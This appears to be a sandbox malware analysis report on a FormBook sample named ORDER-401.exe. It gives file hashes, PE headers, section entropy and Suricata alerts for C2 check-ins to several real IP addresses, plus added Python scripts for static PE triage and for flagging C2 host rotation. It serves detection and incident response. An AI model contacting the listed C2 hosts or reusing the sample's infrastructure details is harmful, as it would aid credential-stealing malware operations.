                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:ORDER-401.exe
                                                                  File size:762'368 bytes
                                                                  MD5:3dfa099ee923a3f449f97ca8f522f703
                                                                  SHA1:b2aece2499d5d90eb59d7e0d8a908c162d7e70f1
                                                                  SHA256:756abd1273244ba91c1b9bd7bb86182e9012e12f2599cb715f9757cc34e3a81e
                                                                  SHA512:a873640e852943458df7fee7983e79063ad06c00a80db7056f5cab0ca72ac384a5b5012b9e274e3f1a1d02fc82059b9532c27f5fc22fe2e70643e3ec2a3dccef
                                                                  SSDEEP:12288:/fsSMXtdwCUEou5+tJ5gL1OPUCaBqffDxQ4LFS7erQg3cRL7XlrGw6GABR5OiYWa:Xs+/Eovt0LYPvaBaBSCPElrGDFrMW/y
                                                                  TLSH:2FF412187A47D806CA9257341EB1F2B56BAC7EEDA801D3074FE86DEFBC26F154C48291
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg..............0...... ........... ........@.. ....................................@................................
                                                                  Icon Hash:0697f0b9b0b1d827
                                                                  Entrypoint:0x4b9eb2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6750ADB2 [Wed Dec 4 19:29:54 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; 0x402000 = imagebase 0x400000 + IAT RVA 0x2000 (see the data directories below); the IAT's only entry is mscoree.dll!_CorExeMain, so this is the standard .NET native entry stub and nothing after the jmp is code
push ebx                     ; from here on the disassembler is decoding data bytes, not instructions
add byte ptr [ecx+00h], bh
jnc 00007F460089C3E2h
je 00007F460089C3E2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F460089C3E2h
imul eax, dword ptr [eax], 00610076h
je 00007F460089C3E2h
outsd
add byte ptr [edx+00h], dh
add byte ptr [eax], al       ; 00 00, repeated 81 times in the original listing: zero bytes, not instructions
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb9e60          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xba000          0x1de4        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xbc000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type           Entropy              Characteristics
.text   0x2000           0xb7ed8       0xb8000   f24124381401b68f9c5c4964a5159d9a  False     0.9235136612601902  OpenPGP Secret Key  7.789767866575687    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xba000          0x1de4        0x1e00    e90c7decf45174b85a6567dbce2197ca  False     0.8513020833333333  data                7.387110084495342    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xbc000          0xc           0x200     3a659cc56f6bdf42041f859bae060971  False     0.044921875         data                0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
The "OpenPGP Secret Key" file type for .text is the file-type guesser matching near-random bytes; an entropy of 7.79 in the only executable section is the static footprint of a packed or encrypted payload, consistent with the ".NET source code contains potential unpacker" signature above.
Name           RVA      Size    Type                                                                              Language  Country  ZLIB Complexity
RT_ICON        0xba100  0x174e  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                          0.9639624539054643
RT_GROUP_ICON  0xbb860  0x14    data                                                                                                 1.05
RT_VERSION     0xbb884  0x360   data                                                                                                 0.42476851851851855
RT_MANIFEST    0xbbbf4  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
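The static block above can be reproduced from the raw headers without a sandbox. The following script is an added example (not code from the report or from Joe Sandbox): it parses a PE32 image's COFF header, optional header, data directories and section table, computes per-section Shannon entropy, and reports the three facts that matter for triage here: whether the CLR header (COM descriptor directory) is present, whether the security directory is empty (unsigned), and whether an executable section is high-entropy. Because it has to run offline, the image it analyses is constructed in memory: the header values copy this sample's (entrypoint, image base, DLL characteristics, data directory layout) but the section contents are synthetic, and the 7.0 entropy threshold is an assumption, not a report value.

```python
"""Static PE32 triage: CLR header, Authenticode directory, section entropy.

Added example, not code from the sandbox report. build_sample_pe() constructs an
image in memory so the script runs offline; its headers copy the sample's values
but the section bytes are synthetic. HIGH_ENTROPY is an assumed threshold.
"""
import math
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # Authenticode signature blob
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # CLR header: present => managed (.NET) image
IMAGE_SCN_MEM_EXECUTE = 0x20000000
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
HIGH_ENTROPY = 7.0  # assumption: packed/encrypted code sits above this (max is 8.0)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe() -> bytes:
    """Constructed PE32 with .text/.rsrc/.reloc; only fields the triage reads are meaningful."""
    sections = [  # name, virtual address, characteristics, synthetic raw bytes
        (b".text", 0x2000, 0x60000020, bytes(range(256)) * 2),  # CODE|EXECUTE|READ, uniform bytes
        (b".rsrc", 0xBA000, 0x40000040, b"ABCD" * 128),          # INITIALIZED_DATA|READ
        (b".reloc", 0xBC000, 0x42000040, b"\x00" * 512),         # INITIALIZED_DATA|DISCARDABLE|READ
    ]
    dirs = [(0, 0)] * 16
    dirs[1] = (0xB9E60, 0x4F)    # IMPORT
    dirs[2] = (0xBA000, 0x1DE4)  # RESOURCE
    dirs[5] = (0xBC000, 0xC)     # BASERELOC
    dirs[12] = (0x2000, 0x8)     # IAT (the jmp at the entrypoint goes through it)
    dirs[14] = (0x2008, 0x48)    # COM_DESCRIPTOR: CLR header
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)  # e_lfanew at offset 0x3c
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x6750ADB2, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB9I6H4I2H6I", 0x10B, 48, 0,
                      0xB8000, 0x2000, 0, 0xB9EB2, 0x2000, 0xBA000, 0x400000, 0x2000, 0x200,
                      4, 0, 0, 0, 4, 0,           # OS / image / subsystem versions
                      0, 0xBE000, 0x200, 0,        # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0x8540,                   # Subsystem GUI, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    headers = dos + b"PE\x00\x00" + coff + opt
    raw_ptr, body, table = 0x200, b"", b""
    for name, va, chars, data in sections:
        table += struct.pack("<8s6I2HI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
    return (headers + table).ljust(0x200, b"\x00") + body


def triage(pe: bytes) -> dict:
    """Read the headers a static triage looks at and return the findings."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", pe, opt_off)[0] != 0x10B:
        raise ValueError("only PE32 handled here (PE32+ has a different optional header)")
    entry = struct.unpack_from("<I", pe, opt_off + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt_off + 28)[0]
    dll_chars = struct.unpack_from("<H", pe, opt_off + 70)[0]
    ndirs = struct.unpack_from("<I", pe, opt_off + 92)[0]
    dirs = [struct.unpack_from("<II", pe, opt_off + 96 + 8 * i) for i in range(ndirs)]
    dir_size = lambda i: dirs[i][1] if i < len(dirs) else 0
    sections = []
    for i in range(nsections):
        name, _, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8s6I2HI", pe, opt_off + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode(), "va": va,
                         "entropy": round(shannon_entropy(pe[rawptr:rawptr + rawsize]), 3),
                         "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
    return {
        "entrypoint": image_base + entry,
        "timestamp": timestamp,
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "dotnet": dir_size(IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) != 0,
        "signed": dir_size(IMAGE_DIRECTORY_ENTRY_SECURITY) != 0,
        "high_entropy_code": [s["name"] for s in sections if s["executable"] and s["entropy"] >= HIGH_ENTROPY],
        "sections": sections,
    }


if __name__ == "__main__":
    report = triage(build_sample_pe())
    print(f"entrypoint 0x{report['entrypoint']:x}  .NET={report['dotnet']}  signed={report['signed']}")
    print("DLL characteristics:", ", ".join(report["dll_characteristics"]))
    for s in report["sections"]:
        print(f"  {s['name']:<7} VA=0x{s['va']:x} entropy={s['entropy']:.3f} exec={s['executable']}")
    print("high-entropy executable sections:", report["high_entropy_code"])
```

To use it on a real file, replace `build_sample_pe()` with `open(path, "rb").read()`; the parser rejects PE32+ deliberately, since the 64-bit optional header shifts every offset used here. Entropy is computed over the raw section bytes, so a section whose raw size is padded with zeros (as .reloc is) scores lower than its virtual contents would.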
Timestamp                        SID      Signature                                      Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-12-12T21:38:10.419837+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49714        161.97.142.144   80         TCP
2024-12-12T21:38:10.419837+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49714        161.97.142.144   80         TCP
2024-12-12T21:38:28.268922+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49715        107.155.56.30    80         TCP
2024-12-12T21:38:30.964806+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49716        107.155.56.30    80         TCP
2024-12-12T21:38:33.628273+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49717        107.155.56.30    80         TCP
2024-12-12T21:38:36.355592+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49718        107.155.56.30    80         TCP
2024-12-12T21:38:36.355592+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49718        107.155.56.30    80         TCP
2024-12-12T21:38:44.284528+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49719        18.139.62.226    80         TCP
2024-12-12T21:38:46.956483+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49720        18.139.62.226    80         TCP
2024-12-12T21:38:49.641750+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49721        18.139.62.226    80         TCP
2024-12-12T21:38:52.357197+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49722        18.139.62.226    80         TCP
2024-12-12T21:38:52.357197+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49722        18.139.62.226    80         TCP
2024-12-12T21:39:07.390754+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49723        209.74.77.107    80         TCP
2024-12-12T21:39:10.051965+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49724        209.74.77.107    80         TCP
2024-12-12T21:39:12.784154+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49725        209.74.77.107    80         TCP
2024-12-12T21:39:15.387860+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49726        209.74.77.107    80         TCP
2024-12-12T21:39:15.387860+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49726        209.74.77.107    80         TCP
2024-12-12T21:39:22.706760+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49727        154.205.159.116  80         TCP
2024-12-12T21:39:25.378330+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49728        154.205.159.116  80         TCP
2024-12-12T21:39:28.050478+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49729        154.205.159.116  80         TCP
2024-12-12T21:39:30.889518+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49730        154.205.159.116  80         TCP
2024-12-12T21:39:30.889518+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49730        154.205.159.116  80         TCP
2024-12-12T21:39:37.625829+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49731        3.33.130.190     80         TCP
2024-12-12T21:39:40.722439+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49732        3.33.130.190     80         TCP
2024-12-12T21:39:42.967531+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49733        3.33.130.190     80         TCP
2024-12-12T21:39:45.713532+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5       1         192.168.2.8  49734        3.33.130.190     80         TCP
2024-12-12T21:39:45.713532+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2    1         192.168.2.8  49734        3.33.130.190     80         TCP
2024-12-12T21:39:53.867876+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3   1         192.168.2.8  49735        38.46.13.54      80         TCP
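Two things in the alert table above matter for anyone turning it into a detection: the ET and ETPRO rules both fire on the same GET (same timestamp, same source port), so counting alerts double-counts check-ins, and the same FormBook signature hits seven different destination IPs in under two minutes, which is the bot walking through its configured C2 host list. The script below is an added example (not code from the report or from Suricata): it collapses alerts to TCP flows, reconstructs the per-host request sequence (three POSTs then a GET per host, as the table shows), and flags the rotation across hosts. The rows embedded in it are an excerpt copied from the table above in pipe-separated form (13 of the 29 rows); the 300-second window and the three-host threshold are assumptions, not values from the report.

```python
"""Triage of Suricata alerts for FormBook check-ins: dedupe per flow, rebuild the
per-host request sequence, flag rotation across C2 hosts.

Added example, not code from the report. ALERT_ROWS is an excerpt copied from the
report's alert table; window_s and min_hosts below are assumed thresholds.
"""
import re
from collections import defaultdict
from datetime import datetime

ALERT_ROWS = """\
2024-12-12T21:38:10.419837+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.8|49714|161.97.142.144|80|TCP
2024-12-12T21:38:10.419837+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.8|49714|161.97.142.144|80|TCP
2024-12-12T21:38:28.268922+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49715|107.155.56.30|80|TCP
2024-12-12T21:38:30.964806+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49716|107.155.56.30|80|TCP
2024-12-12T21:38:33.628273+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49717|107.155.56.30|80|TCP
2024-12-12T21:38:36.355592+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.8|49718|107.155.56.30|80|TCP
2024-12-12T21:38:36.355592+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.8|49718|107.155.56.30|80|TCP
2024-12-12T21:38:44.284528+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49719|18.139.62.226|80|TCP
2024-12-12T21:38:46.956483+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49720|18.139.62.226|80|TCP
2024-12-12T21:38:49.641750+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49721|18.139.62.226|80|TCP
2024-12-12T21:38:52.357197+0100|2050745|ET MALWARE FormBook CnC Checkin (GET) M5|1|192.168.2.8|49722|18.139.62.226|80|TCP
2024-12-12T21:38:52.357197+0100|2855465|ETPRO MALWARE FormBook CnC Checkin (GET) M2|1|192.168.2.8|49722|18.139.62.226|80|TCP
2024-12-12T21:39:53.867876+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.8|49735|38.46.13.54|80|TCP
"""

METHOD_RE = re.compile(r"\((GET|POST)\)")  # the rule names carry the HTTP method


def parse_alerts(text):
    """One dict per alert row; the timestamp keeps its +0100 offset."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("|")
        m = METHOD_RE.search(sig)
        alerts.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "signature": sig, "severity": int(sev),
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport),
            "proto": proto, "method": m.group(1) if m else None,
        })
    return alerts


def flows(alerts):
    """Collapse alerts to one record per 5-tuple. ET (2050745) and ETPRO (2855465)
    both fire on the same GET, so alert counts overstate the number of check-ins."""
    by_flow = {}
    for a in alerts:
        key = (a["src"], a["sport"], a["dst"], a["dport"], a["proto"])
        f = by_flow.setdefault(key, {"dst": a["dst"], "time": a["time"],
                                     "method": a["method"], "sids": set()})
        f["sids"].add(a["sid"])
    return sorted(by_flow.values(), key=lambda f: f["time"])


def checkin_sequence(alerts):
    """Per destination: ordered request methods plus first/last seen."""
    seq = defaultdict(lambda: {"methods": [], "first": None, "last": None})
    for f in flows(alerts):
        s = seq[f["dst"]]
        s["methods"].append(f["method"])
        s["first"] = s["first"] or f["time"]
        s["last"] = f["time"]
    return dict(seq)


def c2_rotation(alerts, family="FormBook", window_s=300, min_hosts=3):
    """Flag a host walking a C2 list: at least min_hosts distinct destinations hit
    with the same family's check-in signature inside a sliding window_s window."""
    fam = flows(a for a in alerts if family in a["signature"])  # already time-sorted
    best = []
    for i, start in enumerate(fam):
        seen = []
        for f in fam[i:]:
            if (f["time"] - start["time"]).total_seconds() > window_s:
                break
            if f["dst"] not in seen:
                seen.append(f["dst"])
        if len(seen) > len(best):
            best = seen
    return {"hosts": best, "rotation": len(best) >= min_hosts}


if __name__ == "__main__":
    alerts = parse_alerts(ALERT_ROWS)
    print(f"{len(alerts)} alerts -> {len(flows(alerts))} flows")
    for dst, s in checkin_sequence(alerts).items():
        print(f"  {dst:<16} {' '.join(s['methods']):<20} {s['first'].time()} .. {s['last'].time()}")
    print("C2 rotation:", c2_rotation(alerts))
```

The window check is a plain sliding window over time-sorted flows, so it also catches a slower walk through the list as long as three hosts fall inside the window; tightening `window_s` to 20 seconds on this excerpt no longer flags it, because each host is only contacted for about ten seconds before the bot moves on.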
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 12, 2024 21:38:09.051649094 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:09.172081947 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:09.172727108 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:09.183099031 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:09.303062916 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:10.418154001 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:10.418684006 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:10.418700933 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:10.419836998 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:10.423027992 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:10.424021959 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:10.430664062 CET  49714        80         192.168.2.8      161.97.142.144
Dec 12, 2024 21:38:10.550676107 CET  80           49714      161.97.142.144   192.168.2.8
Dec 12, 2024 21:38:26.617758036 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:26.737797022 CET  80           49715      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:26.737889051 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:26.753129005 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:26.873056889 CET  80           49715      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:28.268922091 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:28.317806005 CET  80           49715      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:28.317904949 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:28.318028927 CET  80           49715      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:28.318077087 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:28.388921022 CET  80           49715      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:28.389051914 CET  49715        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:29.287888050 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:29.408747911 CET  80           49716      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:29.409281969 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:29.424287081 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:29.544205904 CET  80           49716      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:30.964806080 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:30.990894079 CET  80           49716      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:30.990958929 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:30.991097927 CET  80           49716      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:30.991141081 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:31.084760904 CET  80           49716      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:31.085036993 CET  49716        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:31.989232063 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:32.109402895 CET  80           49717      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:32.109524965 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:32.126044035 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:32.245954990 CET  80           49717      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:32.246341944 CET  80           49717      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:33.628273010 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:33.693423033 CET  80           49717      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:33.693502903 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:33.748598099 CET  80           49717      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:33.748652935 CET  49717        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:34.646922112 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:34.766993999 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:34.767266989 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:34.777084112 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:34.897036076 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.355451107 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.355465889 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.355592012 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.357352972 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.357367039 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.357422113 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.359385967 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.359400034 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.359410048 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.359445095 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.361515999 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.361530066 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.361541033 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:36.361623049 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.361623049 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.364660025 CET  49718        80         192.168.2.8      107.155.56.30
Dec 12, 2024 21:38:36.485364914 CET  80           49718      107.155.56.30    192.168.2.8
Dec 12, 2024 21:38:42.526638031 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:42.648552895 CET  80           49719      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:42.648657084 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:42.772784948 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:42.892705917 CET  80           49719      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:44.284528017 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:44.289469004 CET  80           49719      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:44.289484978 CET  80           49719      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:44.289526939 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:44.289557934 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:44.405498028 CET  80           49719      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:44.405608892 CET  49719        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:45.311338902 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:45.433155060 CET  80           49720      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:45.433228016 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:45.451946974 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:45.572417974 CET  80           49720      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:46.956482887 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:47.046320915 CET  80           49720      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:47.046386003 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:47.046619892 CET  80           49720      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:47.046664953 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:47.076724052 CET  80           49720      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:47.076811075 CET  49720        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:47.975272894 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:48.095321894 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:48.095402002 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:48.111126900 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:48.232703924 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:48.232805014 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:49.641750097 CET  49721        80         192.168.2.8      18.139.62.226
